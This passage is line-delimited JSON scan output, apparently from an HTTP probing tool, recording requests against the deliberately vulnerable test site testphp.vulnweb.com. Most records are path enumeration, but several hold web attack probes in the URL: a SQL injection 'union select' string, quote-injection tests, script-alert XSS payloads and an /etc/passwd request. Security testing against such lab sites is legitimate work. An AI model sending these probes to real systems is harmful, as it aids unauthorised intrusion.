Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php1\",\"time\":\"338.908648ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.339792364Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/style.css\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/style.css\",\"time\":\"355.327675ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.359399332Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/userinfo.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/userinfo.php\",\"time\":\"355.920387ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.386586184Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php=\\\"\",\"input\":\"http://testphp.vulnweb.com:80/categories.php=%22\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php=%22\",\"time\":\"351.716549ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.46291816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php='\",\"input\":\"http://testphp.vulnweb.com:80/categories.php='\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php='\",\"time\":\"342.836396ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.463375151Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php=')\",\"input\":\"http://testphp.vulnweb.com:80/categories.php=')\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php=')\",\"time\":\"338.482746ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.514852722Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php=1\",\"input\":\"http://testphp.vulnweb.com:80/categories.php=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php=1\",\"time\":\"343.99523ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.522274324Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.phpunion select 1,2,3,4,5--+\",\"input\":\"http://testphp.vulnweb.com:80/categories.phpunion%20select%201,2,3,4,5--+\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.phpunion%20select%201,2,3,4,5--+\",\"time\":\"342.872986ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.556148226Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/cgi-bin\",\"input\":\"http://testphp.vulnweb.com:80/cgi-bin\",\"title\":\"403 Forbidden\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cgi-bin\",\"time\":\"361.898282ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":10,\"status_code\":403,\"content_length\":276,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.607731159Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/cgi-bin/status\",\"input\":\"http://testphp.vulnweb.com:80/cgi-bin/status\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cgi-bin/status\",\"time\":\"347.181815ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":10,\"status_code\":404,\"content_length\":273,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.664844139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php\\u003ch1\\u003etefa\\u003c/h1\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/comment.php%3Ch1%3Etefa%3C/h1%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php%3Ch1%3Etefa%3C/h1%3E\",\"time\":\"346.750832ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.670813986Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?\",\"location\":\"./index.php\",\"title\":\"comment on\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php\",\"time\":\"346.951278ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":302,\"content_length\":1246,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.69653306Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?aid=1\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?aid=1\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=1\",\"time\":\"338.78533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.703832157Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?aid=2\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?aid=2\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=2\",\"time\":\"338.837454ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.911985873Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?aid=3\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?aid=3\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=3\",\"time\":\"351.717514ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.913847123Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=1\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=1\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=1\",\"time\":\"352.447178ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.916907327Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=2\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=2\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=2\",\"time\":\"346.752821ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.958604167Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=3\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=3\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=3\",\"time\":\"338.949721ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.98071008Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=4\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=4\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=4\",\"time\":\"343.130223ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.99709117Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=6\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=6\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=6\",\"time\":\"342.679951ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.001010323Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=5\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=5\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=5\",\"time\":\"352.335682ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.063204278Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/comment.php?pid=7\",\"input\":\"http://testphp.vulnweb.com:80/comment.php?pid=7\",\"title\":\"comment on picture\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?pid=7\",\"time\":\"339.585732ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.139165984Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/crossdomain.xml\",\"input\":\"http://testphp.vulnweb.com:80/crossdomain.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/crossdomain.xml\",\"time\":\"355.514343ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":8,\"lines\":5,\"status_code\":200,\"content_length\":224,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.169508188Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/database_connect.phps\",\"input\":\"http://testphp.vulnweb.com:80/database_connect.phps\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/database_connect.phps\",\"time\":\"343.39487ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.186694364Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/database_connect.php\",\"input\":\"http://testphp.vulnweb.com:80/database_connect.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/database_connect.php\",\"time\":\"357.763241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.221304458Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/default.php\",\"input\":\"http://testphp.vulnweb.com:80/default.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/default.php\",\"time\":\"349.928462ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.225881889Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/detailsartists.php\",\"input\":\"http://testphp.vulnweb.com:80/detailsartists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/detailsartists.php\",\"time\":\"347.590434ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.227257618Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/detialsarray.php\",\"input\":\"http://testphp.vulnweb.com:80/detialsarray.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/detialsarray.php\",\"time\":\"355.886111ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.338995137Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/disclaimer.php=1\",\"input\":\"http://testphp.vulnweb.com:80/disclaimer.php=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/disclaimer.php=1\",\"time\":\"351.874805ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.342271328Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/disclaimer.php\",\"title\":\"disclaimer\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/disclaimer.php\",\"time\":\"357.446203ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":574,\"lines\":115,\"status_code\":200,\"content_length\":5524,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.386435961Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/etc\",\"input\":\"http://testphp.vulnweb.com:80/etc\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/etc\",\"time\":\"354.097855ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.386497743Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/editor\",\"input\":\"http://testphp.vulnweb.com:80/editor\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/editor\",\"time\":\"358.195168ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.411595627Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/etc/passwd\",\"input\":\"http://testphp.vulnweb.com:80/etc/passwd\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/etc/passwd\",\"time\":\"356.380136ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.440540312Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/file\",\"input\":\"http://testphp.vulnweb.com:80/file\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/file\",\"time\":\"351.019753ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.504974376Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ftp\",\"input\":\"http://testphp.vulnweb.com:80/ftp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ftp\",\"time\":\"342.884077ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.508306626Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/forward.php\",\"input\":\"http://testphp.vulnweb.com:80/forward.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/forward.php\",\"time\":\"342.398501ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.577389385Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/guestbook.php\\u003cscript\\u003ealert(\\\"XSS ATTACK By BINUSHACKER TEAM\\\")\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/guestbook.php%3Cscript%3Ealert(%22XSS%20ATTACK%20By%20BINUSHACKER%20TEAM%22)%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php%3Cscript%3Ealert%28%22XSS%20ATTACK%20By%20BINUSHACKER%20TEAM%22%29%3C/script%3E\",\"time\":\"350.63578ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.588353101Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/guestbook.php\",\"title\":\"guestbook\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php\",\"time\":\"355.350996ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":515,\"lines\":113,\"status_code\":200,\"content_length\":5390,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.601042968Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/guestbook.php\\u003cscript\\u003ealert(\\\"XSS ATTACK By BINUSHACKER TEAM\\\")\\u003c/script\\u003e\\u003cMARQUEE BGCOLOR=\\\"RED\\\"\\u003e\\u003cH1\\u003eXSS Attack by BinusHacker Team\\u003c/H1\\u003e\\u003c/MARQUEE\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/guestbook.php%3Cscript%3Ealert(%22XSS%20ATTACK%20By%20BINUSHACKER%20TEAM%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php%3Cscript%3Ealert%28%22XSS%20ATTACK%20By%20BINUSHACKER%20TEAM%22%29%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E\",\"time\":\"347.630539ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.654947846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/guestbook.php\\u003cscript\\u003ealert('xss')\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/guestbook.php%3Cscript%3Ealert('xss')%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E\",\"time\":\"350.558707ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.850187894Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/guestbook.php'\",\"input\":\"http://testphp.vulnweb.com:80/guestbook.php'\",\"title\":\"404 Not 